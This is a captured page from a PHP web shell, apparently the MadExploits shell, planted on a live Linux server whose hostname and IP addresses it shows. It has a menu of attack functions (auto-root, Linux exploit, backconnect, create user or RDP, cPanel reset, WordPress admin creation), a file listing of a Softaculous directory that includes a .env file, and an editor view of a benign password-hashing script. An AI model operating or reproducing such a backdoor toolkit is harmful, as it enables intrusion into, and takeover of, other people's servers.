Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.142.55.138
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
stripe /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
545
B
-rw-r--r--
_.htaccess
1.2
KB
-rw-r--r--
__config.php
622
B
-rw-r--r--
_edit.php
4.96
KB
-rw-r--r--
_edit.xml
447
B
-rw-r--r--
_upgrade.php
3.09
KB
-rw-r--r--
_upgrade.xml
383
B
-rw-r--r--
clone.php
9.47
KB
-rw-r--r--
error-404.html
3.68
KB
-rw-r--r--
error-500.html
3.58
KB
-rw-r--r--
extend.php
7.09
KB
-rw-r--r--
fileindex.php
160
B
-rw-r--r--
import.php
3.95
KB
-rw-r--r--
info.xml
3.39
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
10.26
KB
-rw-r--r--
install.xml
3.16
KB
-rw-r--r--
md5
1.72
KB
-rw-r--r--
notes.txt
1.99
KB
-rw-r--r--
update_pass.php
2.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_pass.php
<?php $salt = __salt('[[admin_pass]]'); $methodAndSalt = '$2y$' . $salt; $resp = crypt('[[admin_pass]]', $methodAndSalt); echo '<update_pass>'.$resp.'</update_pass>'; echo '<update_salt>'.$salt.'</update_salt>'; @unlink('update_pass.php'); // Create the Salt function __salt($password, $member = null) { $generator = new __RandomGenerator(); return sprintf('%02d', 10) . '$' . substr($generator->generateHash('sha1'), 0, 22); } // Class to create the salt class __RandomGenerator { /** * Note: Returned values are not guaranteed to be crypto-safe, * depending on the used retrieval method. * * @return string Returns a random series of bytes */ function generateEntropy() { $isWin = preg_match('/WIN/', PHP_OS); // TODO Fails with "Could not gather sufficient random data" on IIS, temporarily disabled on windows if(!$isWin) { if(function_exists('mcrypt_create_iv')) { $e = mcrypt_create_iv(64, MCRYPT_DEV_URANDOM); if($e !== false) return $e; } } // Fall back to SSL methods - may slow down execution by a few ms if (function_exists('openssl_random_pseudo_bytes')) { $e = openssl_random_pseudo_bytes(64, $strong); // Only return if strong algorithm was used if($strong) return $e; } // Read from the unix random number generator if(!$isWin && !ini_get('open_basedir') && is_readable('/dev/urandom') && ($h = fopen('/dev/urandom', 'rb'))) { $e = fread($h, 64); fclose($h); return $e; } // Warning: Both methods below are considered weak // try to read from the windows RNG if($isWin && class_exists('COM')) { try { $comObj = new COM('CAPICOM.Utilities.1'); $e = base64_decode($comObj->GetRandom(64, 0)); return $e; } catch (Exception $ex) { } } // Fallback to good old mt_rand() return uniqid(mt_rand(), true); } /** * Generates a hash suitable for manual session identifiers, CSRF tokens, etc. * * @param String $algorithm Any identifier listed in hash_algos() (Default: whirlpool) * If possible, choose a slow algorithm which complicates brute force attacks. * @return String Returned length will depend on the used $algorithm */ function generateHash($algorithm = 'whirlpool') { return hash($algorithm, $this->generateEntropy()); } } ?>
Close